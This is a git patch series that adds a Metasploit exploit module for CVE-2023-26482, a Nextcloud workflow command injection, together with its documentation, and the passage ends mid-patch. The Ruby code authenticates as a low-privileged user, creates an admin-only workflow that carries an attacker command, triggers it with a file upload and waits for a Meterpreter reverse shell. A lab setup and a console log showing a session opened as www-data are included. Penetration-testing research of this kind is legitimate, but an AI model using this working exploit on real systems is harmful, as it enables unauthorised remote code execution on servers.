From e819362398f61ca8ab156bfb3b8c7a5209f54aa1 Mon Sep 17 00:00:00 2001 From: jenkins-metasploit Date: Wed, 9 Apr 2025 11:24:47 +0000 Subject: [PATCH 01/27] automatic module_metadata_base.json update --- .../unix/webapp/nextcloud_workflows_rce.md | 149 ++++++++++ .../unix/webapp/nextcloud_workflows_rce.rb | 267 ++++++++++++++++++ 2 files changed, 416 insertions(+) create mode 100644 documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md create mode 100644 modules/exploits/unix/webapp/nextcloud_workflows_rce.rb diff --git a/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md new file mode 100644 index 0000000000000..d69c15c02b817 --- /dev/null +++ b/documentation/modules/exploit/unix/webapp/nextcloud_workflows_rce.md @@ -0,0 +1,149 @@ +## Description + +This module exploits a command injection that leads to a remote execution in Nextcloud installations if the app Workflow External Scripts is also installed. +The vulnerability affects Nextcloud versions >= 24.0.0, >= 25.0.0, >= 18.0.0, >= 19.0.0, >= 20.0.0, >= 21.0.0, >= 22.0.0, >= 23.0.0, >= 24.0.0, >= 25.0.0 + +A missing scope validation allowed users to create workflows which are designed to be only available for administrators. In combination with Workflow External Script, this vulnerability +leads to authenticated remote command execution. + +More about the vulnerability detail: [CVE-2023-26482](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-26482). + +The module will automatically use `cmd/linux/http/x64/meterpreter/reverse_tcp` payload. + +The module will check if the target is vulnerable, by adding and removing a dummy-workflow. + + +## Vulnerable Application + +[Nextcloud](https://nextcloud.com/) is a suite of client-server software for creating and using file hosting services. + +This module has been tested successfully on Nextcloud versions: + +* Nextcloud version 24.0.5 + +### Source and Installers + +* [Source Code Repository](https://github.com/nextcloud/server/releases/tag/v24.0.5) +* [Docker](https://hub.docker.com/_/nextcloud) + +### Docker Installation + +This exploit was tested using a [nextcloud docker container](https://hub.docker.com/_/nextcloud) and [docker-compose](https://docs.docker.com/compose/) +with the following docker-compose.yml: + +```yaml +volumes: + nextcloud: + db: + +services: + db: + image: mariadb:10.6 + restart: always + command: --transaction-isolation=READ-COMMITTED --log-bin=binlog --binlog-format=ROW + volumes: + - db:/var/lib/mysql + environment: + - MARIADB_ROOT_PASSWORD=root + - MARIADB_PASSWORD=root + - MARIADB_DATABASE=nextcloud + - MARIADB_USER=nextcloud + + app: + image: nextcloud:24.0.5 + restart: always + ports: + - 8080:80 + links: + - db + environment: + - MYSQL_PASSWORD=root + - MYSQL_DATABASE=nextcloud + - MYSQL_USER=root + - MYSQL_HOST=db + - NEXTCLOUD_ADMIN_PASSWORD=admin + - NEXTCLOUD_ADMIN_USER=admin + - NEXTCLOUD_TRUSTED_DOMAINS="192.168.233.64:8080" + depends_on: + - db +``` + +**_NOTE:_** Change the IP-address and port for NEXTCLOUD_TRUSTED_DOMAINS for your setup + +After `docker compose up -d` login as admin and install the workflow app: "Workflow external script" and +create a low privileged user `alice`. Make sure that you choose "Cron(Recommended)" in the Settings for "Background Jobs". +Before we can run the exploit, we need to start the cronjob. This is crucial because otherwise the +payload doesn't get triggered: + +``` +docker exec -it -u www-data nextcloud-app-1 /bin/bash` +watch -n2 php cron.php +``` + +Wait until you the watch-command outputs something like: "Every 2.0s: php cron.php". + +## Verification Steps +Example steps in this format (is also in the PR): + +1. Do: `use exploit/unix/webapp/nextcloud_workflows_rce` +2. Do: `set RHOSTS [ips]` +3. Do: `set LHOST [lhost]` +4. Do: `set RPORT 8080` +5. Do: `set USERNAME alice` +6. Do: `set PASSWORD alice-password` +7. Do: `run` +8. You should get a shell after a while + +## Options + +### TARGETURI + +Remote web path to the nextcloud installation (default: /) + +### ListenerTimeout + +Number of seconds to wait for the exploit to connect back (default: 960) + +### USERNAME + +The low-privileged username to authenticate to nextcloud + +### PASSWORD + +The password for the low-privileged user + +## Scenarios + +In this scenario the zoneminder-server has the IP address 192.42.0.254. The IP address of the metasploit host is +192.42.1.188. + +### Nextcloud 24.0.5(docker-compose) + +The following demo shows how to use the exploit: + +``` +msf6 > use exploit/unix/webapp/nextcloud_workflows_rce +[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set RHOSTS 192.168.233.64 +RHOSTS => 192.168.233.64 +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set LHOST 192.168.233.117 +LHOST => 192.168.233.117 +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set RPORT 8080 +RPORT => 8080 +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set USERNAME alice +USERNAME => alice +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > set PASSWORD CaeD4ohchaiv5ieDooBa +PASSWORD => CaeD4ohchaiv5ieDooBa +msf6 exploit(unix/webapp/nextcloud_workflows_rce) > run +[*] Started reverse TCP handler on 192.168.233.117:4444 +[*] Sending payload.. +[+] Workflow created +[*] Waiting for the payload to connect back .. +[*] Sending stage (3045380 bytes) to 192.168.233.64 +[*] Meterpreter session 1 opened (192.168.233.117:4444 -> 192.168.233.64:37090) at 2025-04-10 13:27:49 +0000 +[+] Payload connected! +[*] Cleaning up + +meterpreter > getuid +Server username: www-data +``` diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb new file mode 100644 index 0000000000000..2663e01707655 --- /dev/null +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -0,0 +1,267 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + @token = nil + + super( + update_info( + info, + 'Name' => 'Nextcloud Workflows Remote Code Execution', + 'Description' => %q{ + This module adds workflows as an authenticated user + which can only be created by administrators by design. + If the app "Nextcloud Workflow Script" is installed it + is possible to generate a workflow that executes commands. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Enis Maholli', # Discovery + 'arianitisufi', # Discovery + 'Armend Gashi', # Discovery + 'whotwagner' # Metasploit Module + ], + 'References' => [ + ['URL', 'https://github.com/nextcloud/security-advisories/security/advisories/GHSA-h3c9-cmh8-7qpj'], + ['CVE', '2023-26482'] + ], + 'Platform' => %w[linux unix], + 'Targets' => [ + [ + 'nix Command', + { + 'Platform' => %w[unix linux], + 'Arch' => ARCH_CMD, + 'Type' => :unix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp', + 'FETCH_WRITABLE_DIR' => '/tmp' + } + } + ], + [ + 'Linux (Dropper)', + { + 'Platform' => 'linux', + 'Arch' => [ARCH_X64], + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }, + 'Type' => :linux_dropper + } + ] + ], + 'CmdStagerFlavor' => %w[bourne curl wget printf echo], + 'Privileged' => false, + 'DisclosureDate' => '2023-03-30', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [CRASH_SAFE], + 'Reliability' => [REPEATABLE_SESSION], + 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] + } + ) + ) + + register_options( + [ + OptString.new('TARGETURI', [true, 'Path to nextcloud', '/']), + OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit to connect back', 960]), + OptString.new('USERNAME', [true, 'The username to authenticate as']), + OptString.new('PASSWORD', [true, 'The password to authenticate with']) + ] + ) + end + + def parse_token(res) + return if res.nil? + + if defined? res.get_html_document.at('//head/@data-requesttoken').value + Rex::Text.uri_encode(res.get_html_document.at('//head/@data-requesttoken').value) + else + print_error('token not found') + nil + end + end + + def authenticate(user, pass) + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'login'), + 'method' => 'GET', + 'keep_cookies' => true + ) + + @token = parse_token(res) + fail_with(Failure::Unreachable, 'Request Token not found') if @token.nil? + + data = "user=#{user}&password=#{pass}&requesttoken=#{@token}" + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'login'), + 'method' => 'POST', + 'data' => data.to_s, + 'keep_cookies' => true + ) + + fail_with(Failure::Unreachable, 'Login failed') if res.nil? || res.code == 401 + end + + def request_token + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'csrftoken'), + 'method' => 'GET', + 'keep_cookies' => true + ) + + @token = JSON.parse(res.body)['token'] + fail_with(Failure::Unreachable, '2: Request Token not found') if @token.nil? + end + + def create_workflow(operation) + flow_id = nil + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, 'ocs/v2.php/apps/workflowengine/api/v1/workflows/user'), + 'method' => 'POST', + 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'application/json' }, + 'vars_get' => { 'format' => 'json' }, + 'data' => { + 'id' => -1743078702939, + 'class' => 'OCA\\WorkflowScript\\Operation', + 'entity' => 'OCA\\WorkflowEngine\\Entity\\File', + 'events' => ['\\OCP\\Files::postCreate', '\\OCP\\Files::postWrite', '\\OCP\\Files::postTouch'], + 'name' => '', + 'checks' => [ + { + 'class' => 'OCA\\WorkflowEngine\\Check\\FileName', + 'operator' => 'matches', + 'value' => '/.*/', + 'invalid' => false + } + ], + 'operation' => operation, + 'valid' => true + }.to_json, + 'keep_cookies' => true + ) + + fail_with(Failure::Unreachable, 'Unable to create workflow') if res.nil? + + fail_with(Failure::Unreachable, 'Login failed') if res.code == 401 + + if res.code == 200 + json_data = JSON.parse(res.body) + flow_id = json_data['ocs']['data']['id'] + end + flow_id + end + + def upload_file(filename) + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "remote.php/webdav/#{filename}"), + 'method' => 'PUT', + 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'text/plain ' } + ) + end + + def delete_workflow(workflow_id) + url = "ocs/v2.php/apps/workflowengine/api/v1/workflows/user/#{workflow_id}" + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, url), + 'vars_get' => { 'format' => 'json' }, + 'method' => 'DELETE', + 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'application/json' }, + 'keep_cookies' => true + ) + end + + def delete_file(user, filename) + send_request_cgi( + 'uri' => normalize_uri(target_uri.path, "remote.php/dav/files/#{user}/#{filename}"), + 'method' => 'DELETE', + 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'text/plain ' } + ) + end + + # At the end of the module, especially for reverse_tcp payloads, wait for + # the payload to connect back to us. There's a very high probability we + # will lose the payload's signal otherwise. + # + # copied from: linux/http/huawei_hg532n_cmdinject.rb + # + def wait_for_payload_session + print_status 'Waiting for the payload to connect back ..' + begin + Timeout.timeout(datastore['ListenerTimeout']) do + loop do + break if session_created? + + Rex.sleep(0.25) + end + end + rescue ::Timeout::Error + fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back') + end + print_good 'Payload connected!' + end + + def check + # For the check command + cookie_jar.clear + + authenticate(datastore['USERNAME'], datastore['PASSWORD']) + request_token + flow_id = create_workflow('sleep 1') + + Exploit::CheckCode::Safe('Target is not vulnerable') if flow_id.nil? + + delete_workflow(flow_id) + Exploit::CheckCode::Vulnerable + end + + def exploit + # Main function + cookie_jar.clear + + authenticate(datastore['USERNAME'], datastore['PASSWORD']) + + request_token + + case target['Type'] + when :unix_cmd + execute_command(payload.encoded) + when :linux_dropper + execute_cmdstager + end + end + + def execute_command(cmd, _opts = {}) + print_status('Sending payload..') + temp_filename = "#{Rex::Text.rand_text_alpha(5..10)}..txt" + flow_id = create_workflow(cmd.to_s) + + fail_with(Failure::Unreachable, 'Unable to create workflow') if flow_id.nil? + + print_good('Workflow created') + + Thread.new do + # wait a bit until wait_for_payload_session + # is up'n'running + Rex::ThreadSafe.sleep(10) + upload_file(temp_filename) + end + + wait_for_payload_session + + if flow_id + print_status('Cleaning up') + delete_workflow(flow_id) + end + + delete_file(datastore['USERNAME'], temp_filename) + end +end From e6781e60f0d7b2a2bc09ac27dfe2f7bd870d91b9 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Fri, 11 Apr 2025 12:42:50 +0000 Subject: [PATCH 02/27] Changed ranking to Excellent --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 2663e01707655..53c6cf7048b79 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -4,7 +4,7 @@ ## class MetasploitModule < Msf::Exploit::Remote - Rank = NormalRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient From 5f42b3439ef4f55ea0a2e40f9193061ee118d013 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Tue, 15 Apr 2025 13:02:25 +0200 Subject: [PATCH 03/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: Diego Ledda --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 53c6cf7048b79..1c8b902498832 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -81,7 +81,7 @@ def initialize(info = {}) def parse_token(res) return if res.nil? - if defined? res.get_html_document.at('//head/@data-requesttoken').value + if defined? res.get_html_document&.at('//head/@data-requesttoken').value Rex::Text.uri_encode(res.get_html_document.at('//head/@data-requesttoken').value) else print_error('token not found') From 4a08b935429d1104c66d35283cc1ad19353e4656 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Tue, 15 Apr 2025 13:02:46 +0200 Subject: [PATCH 04/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: Diego Ledda --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 1c8b902498832..864e827c40bba 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -154,7 +154,7 @@ def create_workflow(operation) fail_with(Failure::Unreachable, 'Login failed') if res.code == 401 if res.code == 200 - json_data = JSON.parse(res.body) + json_data = res.get_json_document flow_id = json_data['ocs']['data']['id'] end flow_id From 14daed78b2a6c3c7a52988a376935b486e1ed072 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Tue, 15 Apr 2025 13:03:09 +0200 Subject: [PATCH 05/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: Diego Ledda --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 864e827c40bba..8a0e625c1f8a8 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -155,7 +155,7 @@ def create_workflow(operation) if res.code == 200 json_data = res.get_json_document - flow_id = json_data['ocs']['data']['id'] + flow_id = json_data.dig('ocs', 'data', 'id') end flow_id end From 2245516a2174bf051bfbaa566d1da583025274d0 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Tue, 15 Apr 2025 13:03:54 +0200 Subject: [PATCH 06/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 8a0e625c1f8a8..9716b463b92bd 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -169,9 +169,8 @@ def upload_file(filename) end def delete_workflow(workflow_id) - url = "ocs/v2.php/apps/workflowengine/api/v1/workflows/user/#{workflow_id}" send_request_cgi( - 'uri' => normalize_uri(target_uri.path, url), + 'uri' => normalize_uri(target_uri.path, "ocs/v2.php/apps/workflowengine/api/v1/workflows/user/#{workflow_id}"), 'vars_get' => { 'format' => 'json' }, 'method' => 'DELETE', 'headers' => { 'requesttoken' => @token, 'Content-Type' => 'application/json' }, From b1e3b0708eca29fe56143adf9cc18f54f9249e8c Mon Sep 17 00:00:00 2001 From: whotwagner Date: Tue, 15 Apr 2025 11:11:29 +0000 Subject: [PATCH 07/27] Fixed get_html_document in parse_tokens --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 9716b463b92bd..bd6c473f3ea66 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -81,7 +81,7 @@ def initialize(info = {}) def parse_token(res) return if res.nil? - if defined? res.get_html_document&.at('//head/@data-requesttoken').value + if defined? res.get_html_document&.at('//head/@data-requesttoken')&.value Rex::Text.uri_encode(res.get_html_document.at('//head/@data-requesttoken').value) else print_error('token not found') From fde19395cec939d48c937015e0d835392123a934 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Tue, 15 Apr 2025 14:41:40 +0200 Subject: [PATCH 08/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: Diego Ledda --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index bd6c473f3ea66..62f0a4d27f0a4 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -118,7 +118,7 @@ def request_token 'keep_cookies' => true ) - @token = JSON.parse(res.body)['token'] + @token = res.get_json_document['token'] fail_with(Failure::Unreachable, '2: Request Token not found') if @token.nil? end From 5a75e0bb2d7716d839144dadab366e3a2e81ba67 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Tue, 15 Apr 2025 12:55:33 +0000 Subject: [PATCH 09/27] Reformatting res.code for login-failure --- .../exploits/unix/webapp/nextcloud_workflows_rce.rb | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 62f0a4d27f0a4..93ae77ef8f013 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -123,7 +123,6 @@ def request_token end def create_workflow(operation) - flow_id = nil res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'ocs/v2.php/apps/workflowengine/api/v1/workflows/user'), 'method' => 'POST', @@ -151,12 +150,9 @@ def create_workflow(operation) fail_with(Failure::Unreachable, 'Unable to create workflow') if res.nil? - fail_with(Failure::Unreachable, 'Login failed') if res.code == 401 - - if res.code == 200 - json_data = res.get_json_document - flow_id = json_data.dig('ocs', 'data', 'id') - end + fail_with(Failure::Unreachable, 'Login failed') unless res.code != 200 + json_data = res.get_json_document + flow_id = json_data.dig('ocs', 'data', 'id') flow_id end From 92e30b8391503f69336fdc1738221d5d83a8fe2a Mon Sep 17 00:00:00 2001 From: whotwagner Date: Tue, 15 Apr 2025 15:06:33 +0200 Subject: [PATCH 10/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- .../unix/webapp/nextcloud_workflows_rce.rb | 14 ++++---------- 1 file changed, 4 insertions(+), 10 deletions(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 93ae77ef8f013..116739a26bad6 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -190,17 +190,11 @@ def delete_file(user, filename) # def wait_for_payload_session print_status 'Waiting for the payload to connect back ..' - begin - Timeout.timeout(datastore['ListenerTimeout']) do - loop do - break if session_created? - - Rex.sleep(0.25) - end + created = retry_until_truthy(timeout: datastore['ListenerTimeout']) do + session_created? + Rex.sleep(0.25) end - rescue ::Timeout::Error - fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back') - end + fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back') unless created print_good 'Payload connected!' end From d0a3eb43326710b22d95f0291816a65fc0d940c7 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Tue, 15 Apr 2025 13:25:25 +0000 Subject: [PATCH 11/27] Fixed refacturing-bugs --- .../exploits/unix/webapp/nextcloud_workflows_rce.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 116739a26bad6..ce323feb7573b 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Retry def initialize(info = {}) @token = nil @@ -150,7 +151,7 @@ def create_workflow(operation) fail_with(Failure::Unreachable, 'Unable to create workflow') if res.nil? - fail_with(Failure::Unreachable, 'Login failed') unless res.code != 200 + fail_with(Failure::Unreachable, 'Login failed') unless res.code == 200 json_data = res.get_json_document flow_id = json_data.dig('ocs', 'data', 'id') flow_id @@ -190,11 +191,10 @@ def delete_file(user, filename) # def wait_for_payload_session print_status 'Waiting for the payload to connect back ..' - created = retry_until_truthy(timeout: datastore['ListenerTimeout']) do - session_created? - Rex.sleep(0.25) - end - fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back') unless created + created = retry_until_truthy(timeout: datastore['ListenerTimeout']) do + session_created? + end + fail_with(Failure::Unknown, 'Timeout waiting for payload to start/connect-back') unless created print_good 'Payload connected!' end From 4a5d556671cdff50d255183bdfe652a25c45619b Mon Sep 17 00:00:00 2001 From: whotwagner Date: Thu, 24 Apr 2025 12:20:41 +0000 Subject: [PATCH 12/27] Removed linux_dropper from exploit_nextcloud_workflows --- .../exploits/unix/webapp/nextcloud_workflows_rce.rb | 12 ------------ 1 file changed, 12 deletions(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index ce323feb7573b..3aef273564fbd 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -47,17 +47,7 @@ def initialize(info = {}) } } ], - [ - 'Linux (Dropper)', - { - 'Platform' => 'linux', - 'Arch' => [ARCH_X64], - 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }, - 'Type' => :linux_dropper - } - ] ], - 'CmdStagerFlavor' => %w[bourne curl wget printf echo], 'Privileged' => false, 'DisclosureDate' => '2023-03-30', 'DefaultTarget' => 0, @@ -223,8 +213,6 @@ def exploit case target['Type'] when :unix_cmd execute_command(payload.encoded) - when :linux_dropper - execute_cmdstager end end From c9521a0eabddbb0d0e1db59df0fa58dc9adefcdc Mon Sep 17 00:00:00 2001 From: whotwagner Date: Thu, 24 Apr 2025 12:29:18 +0000 Subject: [PATCH 13/27] Removed thread from exploit_nextcloud_workflows --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 3aef273564fbd..1eaef404617a1 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -224,13 +224,7 @@ def execute_command(cmd, _opts = {}) fail_with(Failure::Unreachable, 'Unable to create workflow') if flow_id.nil? print_good('Workflow created') - - Thread.new do - # wait a bit until wait_for_payload_session - # is up'n'running - Rex::ThreadSafe.sleep(10) - upload_file(temp_filename) - end + upload_file(temp_filename) wait_for_payload_session From 6aa2170fbc43b34b86f3fda25cf2ec96dad98365 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Mon, 5 May 2025 13:21:33 +0000 Subject: [PATCH 14/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 1eaef404617a1..eda157fa7e988 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -221,7 +221,7 @@ def execute_command(cmd, _opts = {}) temp_filename = "#{Rex::Text.rand_text_alpha(5..10)}..txt" flow_id = create_workflow(cmd.to_s) - fail_with(Failure::Unreachable, 'Unable to create workflow') if flow_id.nil? + fail_with(Failure::UnexpectedReply, 'Unable to create workflow') if flow_id.nil? print_good('Workflow created') upload_file(temp_filename) From 2ba8e1c255606da1f179db222582e7f6b82f1308 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Mon, 5 May 2025 13:21:48 +0000 Subject: [PATCH 15/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index eda157fa7e988..58fb276af72ee 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -88,7 +88,7 @@ def authenticate(user, pass) ) @token = parse_token(res) - fail_with(Failure::Unreachable, 'Request Token not found') if @token.nil? + fail_with(Failure::UnexpectedReply, 'Request Token not found') if @token.nil? data = "user=#{user}&password=#{pass}&requesttoken=#{@token}" From 83786100b33366c8338789466244dcdd3ab78730 Mon Sep 17 00:00:00 2001 From: whotwagner Date: Mon, 5 May 2025 13:22:14 +0000 Subject: [PATCH 16/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 58fb276af72ee..adba4c636e222 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -99,7 +99,7 @@ def authenticate(user, pass) 'keep_cookies' => true ) - fail_with(Failure::Unreachable, 'Login failed') if res.nil? || res.code == 401 + fail_with(Failure::NoAccess, 'Login failed') if res.nil? || res.code == 401 end def request_token From 9b0aee41f4e9dbb0d787571a45b7f90e61f91bbb Mon Sep 17 00:00:00 2001 From: whotwagner Date: Mon, 5 May 2025 13:22:27 +0000 Subject: [PATCH 17/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index adba4c636e222..79f6aa2c853b8 100644 --- a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb +++ b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb @@ -139,9 +139,7 @@ def create_workflow(operation) 'keep_cookies' => true ) - fail_with(Failure::Unreachable, 'Unable to create workflow') if res.nil? - - fail_with(Failure::Unreachable, 'Login failed') unless res.code == 200 + fail_with(Failure::NoAccess, 'Login failed') unless res&.code == 200 json_data = res.get_json_document flow_id = json_data.dig('ocs', 'data', 'id') flow_id From ad9651db5d51e2595255e17e3132dc28a6187b2a Mon Sep 17 00:00:00 2001 From: whotwagner Date: Mon, 5 May 2025 13:22:50 +0000 Subject: [PATCH 18/27] Update modules/exploits/unix/webapp/nextcloud_workflows_rce.rb Co-authored-by: msutovsky-r7 --- modules/exploits/unix/webapp/nextcloud_workflows_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb b/modules/exploits/unix/webapp/nextcloud_workflows_rce.rb index 79f6aa2c853b8..d6cb9a8d5de45 100644 --- 